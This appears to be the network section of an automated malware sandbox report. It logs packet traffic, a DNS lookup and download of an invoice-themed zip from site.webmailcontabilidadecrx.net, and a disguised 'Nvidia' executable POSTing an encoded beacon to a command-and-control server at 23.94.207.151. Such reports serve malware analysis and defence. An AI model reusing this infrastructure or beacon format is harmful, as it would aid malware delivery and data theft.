                                                      Dec 20, 2024 15:28:37.713321924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.713397026 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.718061924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.718132019 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.721910954 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.721992016 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.727518082 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.727591991 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.732336044 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.732424021 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.737111092 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.737226009 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.741770983 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.741846085 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.745665073 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.745732069 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.751327991 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.751477957 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.755171061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.755238056 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.758903027 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.758970976 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.764581919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.764650106 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.768430948 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.768513918 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.774126053 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.774190903 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.777966976 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.778036118 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.780817032 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.780885935 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.856936932 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.857022047 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.913090944 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.913177967 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.916903019 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.916984081 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.921591997 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.921660900 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.925558090 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.925643921 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.930195093 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.930310965 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.934915066 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.935002089 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.938781977 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.938858986 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.944644928 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.944732904 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.949317932 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.949393988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.953176975 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.953252077 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.957856894 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.957945108 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.961672068 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.961744070 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.965651035 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.965729952 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.970299006 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.970402002 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:37.973959923 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:37.974037886 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.048985004 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.049124956 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.101428986 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.101579905 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.107489109 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.107562065 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.111399889 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.111480951 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.116085052 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.116167068 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.120004892 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.120086908 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.124699116 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.124772072 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.128454924 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.128537893 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.133107901 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.133239031 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.137880087 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.137978077 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.141772032 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.141860962 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.146480083 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.146554947 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.151245117 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.151345968 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.155030012 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.155163050 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.159831047 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.159923077 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.162688971 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.162760019 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.248128891 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.248248100 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.295248985 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.295373917 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.298702955 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.298804998 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.304311991 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.304402113 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.306912899 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.306988001 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.311739922 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.311835051 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.316395044 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.316483974 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.322335005 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.322428942 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.326031923 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.326107025 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.330761909 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.330853939 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.335522890 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.335602045 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.338453054 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.338524103 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.343183994 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.343259096 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.347914934 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.348007917 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.351722002 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.351809025 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.355469942 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.355549097 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.359384060 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.359456062 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.445177078 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.445265055 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.490838051 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.490927935 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.495410919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.495490074 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.499262094 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.499362946 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.503973961 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.504051924 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.509011030 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.509088993 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.512619019 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.512692928 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.517371893 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.517451048 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.521143913 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.521219015 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.527226925 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.527302980 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.530684948 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.530751944 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.535463095 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.535559893 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.540225029 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.540304899 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.543932915 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.544007063 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.548711061 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.548796892 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.551573038 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.551666975 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.660244942 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.660372019 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.726010084 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.726102114 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.730669975 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.730751991 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.735033989 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.735107899 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.738672972 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.738750935 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.744175911 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.744235992 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.747844934 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.747926950 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.751558065 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.751621962 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.756179094 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.756278038 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.760783911 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.760849953 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.766016960 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.766092062 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.769038916 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.769114017 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.772505999 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.772578001 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.775264025 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.775333881 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.779822111 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.779896975 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.782572985 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.782646894 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.851691008 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.851766109 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.917085886 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.917252064 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.920823097 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.920907021 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.926242113 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.926321030 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.929856062 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.929915905 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.933501959 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.933588028 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.938023090 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.938122988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.942601919 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.942703962 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.946355104 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.946444988 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.950934887 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.951014042 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.954598904 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.954679012 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.959177971 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.959247112 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.962899923 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.962975979 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.965607882 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.965682030 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.969216108 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.969285011 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.971925974 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.972024918 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:38.975619078 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:38.975688934 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.047017097 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.047105074 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.113059998 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.113168955 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.117969036 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.118045092 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.121920109 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.121992111 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.124847889 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.124918938 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.130343914 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.130428076 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.134116888 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.134183884 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.138665915 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.138737917 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.142225981 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.142296076 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.146811008 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.146886110 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.150479078 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.150547028 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.155955076 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.156025887 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.158832073 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.158902884 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.161453962 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.161525011 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.165127039 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.165199041 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.168853998 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.168926954 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.242635965 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.242741108 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.302118063 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.302186012 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.307621956 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.307720900 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.311265945 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.311352015 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.314224005 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.314291000 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.314954042 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.315026045 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.318615913 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.318670034 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.324098110 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.324158907 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.327487946 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.327578068 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.327925920 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.328016043 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.328016043 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.329881907 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.329942942 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.329951048 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.329967976 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.330008984 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.330027103 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.330321074 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.330337048 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:39.330348015 CET49718443192.168.2.534.95.215.169
                                                      Dec 20, 2024 15:28:39.330353022 CET4434971834.95.215.169192.168.2.5
                                                      Dec 20, 2024 15:28:45.999336004 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:46.118876934 CET804977023.94.207.151192.168.2.5
                                                      Dec 20, 2024 15:28:46.118954897 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:46.119163990 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:46.119252920 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:46.238605022 CET804977023.94.207.151192.168.2.5
                                                      Dec 20, 2024 15:28:46.239280939 CET804977023.94.207.151192.168.2.5
                                                      Dec 20, 2024 15:28:47.436131001 CET804977023.94.207.151192.168.2.5
                                                      Dec 20, 2024 15:28:47.485132933 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:52.441607952 CET804977023.94.207.151192.168.2.5
                                                      Dec 20, 2024 15:28:52.441828012 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:52.442019939 CET4977080192.168.2.523.94.207.151
                                                      Dec 20, 2024 15:28:52.561662912 CET804977023.94.207.151192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 15:28:21.627558947 CET5100453192.168.2.51.1.1.1
                                                      Dec 20, 2024 15:28:22.040467024 CET53510041.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 20, 2024 15:28:21.627558947 CET192.168.2.51.1.1.10x2579Standard query (0)site.webmailcontabilidadecrx.netA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 20, 2024 15:28:22.040467024 CET1.1.1.1192.168.2.50x2579No error (0)site.webmailcontabilidadecrx.net34.95.215.169A (IP address)IN (0x0001)false
                                                      • site.webmailcontabilidadecrx.net
                                                      • 23.94.207.151
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.54977023.94.207.151807488C:\Nvidia-75619\Nvidia-75619.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 20, 2024 15:28:46.119163990 CET250OUTPOST /avs_pro/index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                                                      Accept: */*
                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                      Content-Length: 135
                                                      Host: 23.94.207.151
                                                      Dec 20, 2024 15:28:46.119252920 CET135OUTData Raw: 6f 70 3d 61 49 6e 37 52 72 42 56 4d 56 35 43 53 69 56 79 61 32 77 52 61 41 4d 44 63 48 4e 2b 41 46 74 54 4d 56 6b 6a 42 6c 6c 66 56 6c 78 44 52 68 59 47 43 42 6c 62 57 30 4a 4b 57 42 68 65 52 56 64 66 46 41 4d 43 64 56 46 4e 47 54 5a 50 49 53 38
                                                      Data Ascii: op=aIn7RrBVMV5CSiVya2wRaAMDcHN+AFtTMVkjBllfVlxDRhYGCBlbW0JKWBheRVdfFAMCdVFNGTZPIS8YfnV9ZGcVcnJ+fCQvKSglcmsDAhwFBxkFCAteS1xDQmMICwYGaRY=
                                                      Dec 20, 2024 15:28:47.436131001 CET203INHTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 14:28:47 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.54971234.95.215.1694432952C:\Windows\System32\svchost.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-20 14:28:23 UTC182OUTHEAD /notafiscal/download/cat.zip HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: site.webmailcontabilidadecrx.net
                                                      2024-12-20 14:28:24 UTC267INHTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 14:28:23 GMT
                                                      Server: Apache
                                                      Upgrade: h2
                                                      Connection: Upgrade, close
                                                      Last-Modified: Wed, 18 Dec 2024 07:18:28 GMT
                                                      ETag: "83c3db-6298638673d7e"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 8635355
                                                      Content-Type: application/zip


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.54971834.95.215.1694432952C:\Windows\System32\svchost.exe
                                                      TimestampBytes transferredDirectionData
